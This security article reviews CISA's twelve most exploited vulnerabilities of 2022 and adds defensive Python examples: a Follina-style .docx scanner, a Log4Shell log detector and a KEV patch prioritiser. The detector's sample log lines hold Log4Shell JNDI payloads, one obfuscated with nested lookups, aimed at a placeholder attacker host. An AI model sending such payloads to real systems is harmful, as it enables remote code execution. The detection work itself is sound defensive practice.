The 12 Most Frequently Exploited Vulnerabilities in 2022
Exploiting known and unpatched vulnerabilities continues to be a common tactic used
by threat actors. From security bypasses and credential exposure to remote code
execution, software vulnerabilities have always been a powerful weapon for cyber
attackers to compromise systems.
While some new entries have appeared in this year's incidents, such as newly discovered vulnerabilities in Active Directory and the MOVEit file transfer application, and those used in the AlienFox toolkit or IceFire ransomware campaigns, several long-known vulnerabilities have remained among the most frequently abused so far.
In this article, we dive into CISA's newly released list of the 12 most frequently exploited vulnerabilities in 2022, which will continue to pose a significant threat to enterprise business.
1. Fortinet FortiOS & FortiProxy (CVE-2018-13379)
Fortinet FortiOS SSL VPNs are primarily deployed in border firewalls and work by isolating sensitive internal networks from the public Internet. CVE-2018-13379 is a particularly severe path traversal vulnerability that allows APT actors to use specially crafted HTTP resource requests to steal legitimate credentials, connect to an unpatched VPN and download system files. Despite the release of a patch back in 2019, CVE-2018-13379 has made several comebacks over the past three years, targeting government, commercial, and technical service networks, among others.
In 2020, a hacker exploited the vulnerability to steal VPN credentials from nearly 50,000 Fortinet VPN devices. Security researchers noted at the time that more than 40 of those 50,000 domains belonged to well-known financial and government organizations. Later that year, the vulnerability reappeared. This time it was exploited by government-backed actors in an attempt to disrupt U.S. election support systems. During this campaign, CVE-2018-13379 was chained with other exploits against Internet-exposed servers to gain access. The vulnerability reappeared in 2021 when 87,000 sets of credentials for FortiGate SSL VPN devices, obtained through the exploitation of CVE-2018-13379, were leaked online.
These critical
vulnerabilities remain lucrative for threat actors. The larger the user base, the
more potential targets there are, which increases the appeal to attackers. Due to
their frequent abuse, the FBI and CISA have issued a joint advisory warning Fortinet
users and administrators to beware of Advanced Persistent Threat (APT) attackers
actively exploiting existing and future critical VPN vulnerabilities. It is highly
likely that these vulnerabilities will continue to be used to gain an initial
foothold in vulnerable environments as a springboard for future attacks.
2-4. Microsoft Exchange Server (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523)
Microsoft Exchange Server is a popular email and support system for global organizations, deployed both on-premises and in the cloud. To this day, a series of vulnerabilities found in unpatched on-premises versions of Microsoft Exchange Server continues to be actively exploited on Internet-facing servers.
This series of vulnerabilities, collectively referred to as "ProxyShell," includes CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523, and affects multiple versions of on-premises Microsoft Exchange Server. ProxyShell targets unpatched Exchange servers to enable pre-authentication Remote Code Execution (RCE). Of the three vulnerabilities, CVE-2021-34473 has the highest CVSS score of 9.1, and while the remaining two were initially categorized as "exploitation less likely", they provide significant value to attackers when used in conjunction with CVE-2021-34473. In short, ProxyShell allows an attacker to execute arbitrary commands on a vulnerable Exchange server over port 443.
All three vulnerabilities were patched in 2021, but security researchers are currently tracking several uncategorized (UNC) threat groups known to be exploiting the ProxyShell vulnerabilities, and expect additional clusters to emerge as new threat actors adopt working exploits for them. In one particular cluster of threat activity tracked as UNC2980, Mandiant researchers observed the ProxyShell vulnerabilities being used in a cyber espionage campaign. In this operation, UNC2980 dropped multiple tools into a U.S. university's environment after gaining access and deploying a web shell via ProxyShell. After gaining access through ProxyShell, the attackers used publicly available tools (e.g., Mimikatz, HTRAN, and EarthWorm) for post-exploitation activity.
5. Microsoft, various products (CVE-2022-30190)
CVE-2022-30190, known as "Follina", is a critical RCE vulnerability that affects multiple Microsoft Office products. Follina allows an attacker to execute arbitrary code after convincing a user to open a malicious Word document, or through any other vector that handles URLs. Because of the large number of unpatched Microsoft Office installations, Follina continues to appear in a variety of cyberattacks.
Known threat actors exploit the Follina vulnerability through phishing campaigns that use social engineering techniques to trick users into opening malicious Office documents. When a user opens such a document, Office automatically fetches the links embedded in it, which invokes the Microsoft Support Diagnostic Tool (MSDT) URL protocol; MSDT is a Microsoft service primarily used to collect system crash information for reporting to Microsoft Support. Threat actors abuse this protocol by crafting links that force the execution of malicious PowerShell commands without any further user interaction. This poses a serious security risk, as it allows attackers to remotely execute unauthorized commands on the target system via seemingly innocuous links.
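The mechanism described above has a defender-side consequence: a Word document that pulls remote content on open is visible in its package relationships before anyone opens it. The following is an added example, not code from the original article or from Microsoft, of a small triage scanner for .docx files. It unzips the package, flags relationships marked TargetMode="External" that point at an http(s) URL and are not ordinary hyperlinks, and separately flags any part that mentions the ms-msdt: URI scheme. The two relationship parts and the minimal zip builder are constructed test inputs; the hostname example.invalid is a placeholder.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Fixed OOXML namespaces used by every .docx package (real values, not assumptions)
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)


def scan_docx(data: bytes) -> dict:
    """Inspect a .docx given as raw bytes and return two indicator lists.

    external_targets: relationships marked TargetMode="External" whose target is
        an http(s) URL and whose type is not an ordinary hyperlink; Office fetches
        such targets automatically when the document is opened.
    msdt_refs: package parts that mention the ms-msdt: URI scheme at all.
    """
    findings = {"external_targets": [], "msdt_refs": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(blob)
                for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                    target = rel.get("Target", "")
                    is_remote = target.lower().startswith(("http://", "https://"))
                    is_link = rel.get("Type", "") == OFFICE_REL + "hyperlink"
                    if rel.get("TargetMode") == "External" and is_remote and not is_link:
                        findings["external_targets"].append((name, target))
            if name.endswith((".xml", ".rels")):
                if MSDT_SCHEME.search(blob.decode("utf-8", errors="ignore")):
                    findings["msdt_refs"].append(name)
    return findings


def is_suspicious(findings: dict) -> bool:
    """A document is flagged if either indicator list is non-empty."""
    return bool(findings["external_targets"] or findings["msdt_refs"])


def build_sample_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx-shaped zip in memory (constructed test input, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationship parts: one benign (local stylesheet plus a normal
# hyperlink) and one that pulls an external object from a placeholder host.
BENIGN_RELS = (
    f'<Relationships xmlns="{PKG_REL_NS}">'
    f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
    f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" Target="https://example.invalid/" TargetMode="External"/>'
    "</Relationships>"
)
REMOTE_OBJECT_RELS = (
    f'<Relationships xmlns="{PKG_REL_NS}">'
    f'<Relationship Id="rId3" Type="{OFFICE_REL}oleObject" Target="http://example.invalid/remote.html" TargetMode="External"/>'
    "</Relationships>"
)

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("remote object", REMOTE_OBJECT_RELS)):
        result = scan_docx(build_sample_docx(rels))
        print(f"{label}: suspicious={is_suspicious(result)} {result}")
```

Ordinary hyperlinks are excluded because they are external relationships too and would otherwise flag nearly every real document; a mail gateway or EDR rule built on this idea would typically quarantine on the external-object condition and alert on the ms-msdt: condition.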
Recently, the Follina vulnerability has been used as a zero-day
exploit to support threat campaigns against key industry organizations. From March
through May 2022, an active cluster tracked as UNC3658 used Follina to attack the
Philippine government. In April of the same year, more Follina samples appeared in
the UNC3347 campaign targeting telecom entities and business services in South Asia.
A third cluster named UNC3819 also used CVE-2022-30190 to attack organizations in
Russia and Belarus.
6. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
A critical vulnerability in the Zoho ManageEngine ADSelfService Plus software, patched in late 2021, led to attacks on at least nine entities in the defense, healthcare, energy, technology and education sectors. The product is marketed as a comprehensive self-service password management and single sign-on (SSO) solution for Active Directory and cloud applications, designed to allow administrators to enforce two-factor authentication (2FA) for application logins while letting users reset their own passwords.
The vulnerability, tracked as CVE-2021-40539, allows threat actors to gain initial access to a victim organization's systems. CVE-2021-40539 (CVSS score 9.8) is an authentication bypass vulnerability affecting REST API URLs that can lead to RCE.
In response, CISA issued an alert about the zero-day vulnerability, informing users how attackers could exploit it to deploy web shells for post-exploitation activities such as stealing administrator credentials, moving laterally, and exfiltrating registry and Active Directory (AD) files. Such vulnerabilities are particularly acute in SSO solutions for AD and cloud applications: if successfully exploited, they give attackers a path via AD to critical applications, sensitive data, and other areas deep within the corporate network.
Exploitation of CVE-2021-40539 was also identified in an attack against the International Committee of the Red Cross (ICRC). In a statement, the ICRC acknowledged that it had missed critical patches that could have protected it from the attack, emphasizing the importance of maintaining a robust patch management process. As a result of the attack, the names, locations and contact information of more than 515,000 people involved in the ICRC's Restoring Family Links program were compromised.
7–8. Atlassian Confluence Server & Data Center (CVE-2021-26084, CVE-2022-26134)
Atlassian Confluence, a
collaboration and documentation platform used by many government and private sector
organizations, is also highly favored by threat actors. The two shortlisted
vulnerabilities, CVE-2021-26084 and CVE-2022-26134, are both related to Object Graph
Navigation Language (OGNL) injection.
The first large-scale exploitation of CVE-2021-26084 occurred in September 2021 and targeted the popular web-based document service. The Confluence platform is designed to allow multiple teams to collaborate on shared projects. A malicious actor could use the injection vulnerability CVE-2021-26084 to execute arbitrary code on a Confluence Server or Data Center instance. Attackers essentially gain the same privileges as the user running the service, and are therefore able to execute any command, obtain elevated administrative privileges, and establish a foothold in the environment. CISA issued an advisory directing users and administrators to apply Atlassian's updates to prevent compromise.
Just nine months later, Atlassian disclosed another OGNL injection vulnerability in Confluence Server and Data Center. Tracked as CVE-2022-26134, the vulnerability allows an unauthenticated attacker to execute arbitrary code in all supported Confluence Data Center and Server versions. After a Proof of Concept (PoC) was released within a week of the initial disclosure, this critical-severity vulnerability quickly became one of the most exploited. In observed cases, CVE-2022-26134 was used to achieve unauthenticated RCE on a server and then deploy a Behinder web shell. The Behinder web shell gives malicious actors very powerful features, such as interaction with Meterpreter and Cobalt Strike and a memory-only web shell.
According to Atlassian's website, the company
supports 83 percent of Fortune 500 companies, has 10 million active users per month,
and has more than 235,000 users in more than 190 countries. These two
Atlassian-based CVEs demonstrate how financially motivated threat actors continue to
exploit vulnerabilities to attack many attractive targets simultaneously.
9. Log4Shell (CVE-2021-44228)
Log4Shell, tracked as CVE-2021-44228 and also known as the "Log4j vulnerability", is the most serious RCE vulnerability found in Apache Log4j, a popular Java-based logging library widely used in a wide range of applications. The vulnerability allows a remote attacker to execute arbitrary code on an affected system, which can lead to unauthorized access, data disclosure, or compromise of the entire system.
The vulnerability, which
was first publicly disclosed in December 2021, is due to the use of untrusted data
in the lookup mechanism of the "log4j2" component, which allows an attacker to
inject malicious code via crafted log messages. This flaw exposed a wide variety of
applications, including web servers, enterprise software, and cloud-based services
that rely on Log4j for logging.
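Because the flaw sits in the lookup mechanism, the tell-tale sign in inbound data is a lookup expression rather than any particular payload, and attackers nest lookups inside one another to hide it from naive string matching. The following is an added example, not code from the original article or from the Apache project, of detection logic for a log-review or WAF pipeline: it models only the small set of Log4j 2 lookups needed to flatten nesting (lower/upper case conversion and the name:-default fallback), collapses them from the inside out, and only then checks for a JNDI lookup. The four access-log lines are constructed samples, and attacker.invalid is a placeholder host.

```python
import re

# One innermost ${...} lookup, i.e. a body with no nested "${" or "}" inside it
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The signature itself, checked only after nested lookups have been collapsed
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(body: str) -> str:
    """Evaluate a single innermost lookup the way Log4j 2's substitutor would.

    Only the lookups that matter for normalising nested input are modelled:
    ${lower:x} / ${upper:x} case conversion and the ${name:-default} fallback,
    which yields "default" when "name" is not a defined lookup. Anything else
    (dates, env, jndi itself) is kept literally so the caller can still see it.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep:
        if kind.lower() == "lower":
            return arg.lower()
        if kind.lower() == "upper":
            return arg.upper()
    return "${" + body + "}"


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        collapsed = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup once nesting has been flattened."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan_log(lines) -> list:
    """Return (line_number, line) for every line that matches."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


# Constructed access-log lines (not real traffic); the hostnames are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${lower:LDAP}://attacker.invalid/b}"',
    '10.0.0.3 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "curl/7.88"',
]

if __name__ == "__main__":
    for n, line in scan_log(SAMPLE_LOG):
        print(f"line {n}: {normalize_lookups(line)}")
```

The fourth sample line shows why the normalisation step matters in both directions: a harmless date lookup is left alone and does not trigger an alert, while the nested form on the third line is reduced to the same string as the plain form on the second before the signature check runs.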
Although Apache quickly released a patch for the CVSS 10.0 RCE vulnerability, security experts confirmed that, given its widespread use among major vendors, exploitation would continue and could lead to widespread malware deployment. CISA has since issued a Binding Operational Directive (BOD) ordering Federal Civilian Executive Branch (FCEB) agencies to patch their systems to address this critical vulnerability.
The rapid exploitation of
Log4shell is attributed to its widespread deployment across different industries and
platforms. What's more, patching the vulnerability has proven extremely challenging
as many organizations struggle to identify and update all instances of Log4j in
their infrastructure in a timely manner.
10–11. VMware Workspace ONE Access & Identity Manager (CVE-2022-22954, CVE-2022-22960)
VMware's popular virtualization software often falls prey to cyber attackers at all levels, including APT groups. Exploiting vulnerabilities in VMware products can grant unauthorized access to virtual machines and critical data hosted on the platform. Because VMware virtualizes multiple systems on a single physical server, a successful attack could compromise multiple virtual machines at once. Typically, attackers target VMware environments in order to gain a foothold in a larger network, leveraging the trust and accessibility of virtualized infrastructure. VMware vulnerabilities took two spots on CISA's list this year.
First, CVE-2022-22954 (CVSS score 9.8) is a server-side template injection vulnerability that a malicious actor with network access can trigger to achieve RCE in VMware Workspace ONE Access & Identity Manager. After the PoC for the vulnerability was released last spring, security researchers discovered that it was being used in active attacks to infect servers with cryptocurrency miners.
Second, CVE-2022-22960 is a privilege escalation vulnerability. According to the CISA advisory, it enables a malicious actor with local access to escalate privileges to root because of incorrect permissions on support scripts. Chained with CVE-2022-22954, an attacker could execute arbitrary shell commands as the VMware service user, then wipe the logs, escalate privileges, and move laterally to other systems with root access.
12. F5 Networks BIG-IP (CVE-2022-1388)
Last
September, F5 released a patch for a critical RCE vulnerability related to the
BIG-IP product suite, and a few days later, security researchers were able to create
an exploit for the vulnerability.
CVE-2022-1388 (CVSS score 9.8) is categorized as a missing-authentication vulnerability: an iControl REST authentication bypass that can let an attacker gain access to and take control of a BIG-IP system. From there, an attacker could perform many malicious actions, such as planting a web shell for later use, deploying cryptocurrency miners and exfiltrating sensitive data.
Remote code execution flaws are easy to
exploit, which makes them a target for opportunistic threat actors. Whenever
vulnerabilities are discovered in Internet-facing services, threat actors are sure
to be quick to exploit them. Vulnerabilities like CVE-2022-1388 provide immediate
initial access to the target network and often enable attackers to conduct attacks
through lateral movement and privilege escalation.
Conclusion
Enterprise security teams must recognize that older vulnerabilities still exist and continue to pose a significant threat. While the latest CVEs are often more visible, CISA's annual list of commonly exploited vulnerabilities is a clear reminder that known vulnerabilities can still wreak havoc on unpatched systems.
In addition to the comprehensive list, CISA provides
guidance for vendors and technology organizations to identify and mitigate potential
risks. Recommendations include adopting secure-by-design practices and prioritizing
the patching of known exploited vulnerabilities to minimize the risk of compromise.
Vendors are also encouraged to establish a coordinated vulnerability disclosure
process to allow for root cause analysis of discovered vulnerabilities.
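The recommendation to prioritize known exploited vulnerabilities is easy to operationalize: CISA publishes the KEV catalog as JSON, and every entry carries a remediation due date, so an asset inventory can be ranked by how far past that date each host already is. The following is an added example, not code from the article or from CISA, that does exactly that. The catalog excerpt is constructed in the real feed's shape (the live file is at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json) using the CVE ids from this article, but every dateAdded and dueDate value is an illustrative placeholder rather than the catalog's actual data; the inventory hosts and the id CVE-0000-0000 are placeholders too.

```python
import json
from datetime import date

# Constructed excerpt in the shape of CISA's KEV catalog JSON (the live feed is
# https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
# The CVE ids are the ones discussed in the article; every date below is an
# illustrative placeholder, not the catalog's real dateAdded/dueDate values.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities (constructed excerpt)",
    "vulnerabilities": [
        {"cveID": "CVE-2018-13379", "vendorProject": "Fortinet", "product": "FortiOS and FortiProxy", "dateAdded": "2021-11-03", "dueDate": "2022-05-03"},
        {"cveID": "CVE-2021-34473", "vendorProject": "Microsoft", "product": "Exchange Server", "dateAdded": "2021-11-03", "dueDate": "2021-11-17"},
        {"cveID": "CVE-2021-31207", "vendorProject": "Microsoft", "product": "Exchange Server", "dateAdded": "2021-11-03", "dueDate": "2021-11-17"},
        {"cveID": "CVE-2021-34523", "vendorProject": "Microsoft", "product": "Exchange Server", "dateAdded": "2021-11-03", "dueDate": "2021-11-17"},
        {"cveID": "CVE-2022-26134", "vendorProject": "Atlassian", "product": "Confluence Server and Data Center", "dateAdded": "2022-06-02", "dueDate": "2022-06-06"},
        {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2", "dateAdded": "2021-12-10", "dueDate": "2021-12-24"},
    ],
})

# Constructed asset inventory: hosts and the CVEs a vulnerability scanner still reports on them.
INVENTORY = [
    {"host": "vpn-edge-01", "unpatched_cves": ["CVE-2018-13379"]},
    {"host": "mail-01", "unpatched_cves": ["CVE-2021-34473", "CVE-2021-31207", "CVE-2021-34523"]},
    {"host": "wiki-01", "unpatched_cves": ["CVE-2022-26134", "CVE-0000-0000"]},  # second id: placeholder, not in KEV
]


def load_kev(kev_json: str) -> dict:
    """Index a KEV catalog document by CVE id."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def prioritize(inventory, kev_json: str, today_iso: str) -> list:
    """Return inventory findings that appear in KEV, most overdue first.

    Findings not in the catalog are dropped here (they still need patching, just
    without the KEV urgency); each returned row carries the catalog due date and
    how many days past it the host is as of today_iso.
    """
    kev = load_kev(kev_json)
    today = date.fromisoformat(today_iso)
    rows = []
    for asset in inventory:
        for cve in asset["unpatched_cves"]:
            entry = kev.get(cve)
            if entry is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            rows.append({
                "host": asset["host"],
                "cve": cve,
                "product": entry["vendorProject"] + " " + entry["product"],
                "due": entry["dueDate"],
                "overdue_days": (today - due).days,
            })
    # Python's sort is stable even with reverse=True, so ties keep inventory order
    rows.sort(key=lambda r: r["overdue_days"], reverse=True)
    return rows


if __name__ == "__main__":
    for row in prioritize(INVENTORY, KEV_SAMPLE, "2023-08-01"):
        print(f'{row["host"]:12} {row["cve"]:15} due {row["due"]}  {row["overdue_days"]:4d} days overdue  ({row["product"]})')
```

In practice the catalog string would come from a scheduled download of the feed and the inventory from the scanner's export; the ranking logic stays the same, and the dropped non-KEV findings would feed the normal, lower-priority patch queue.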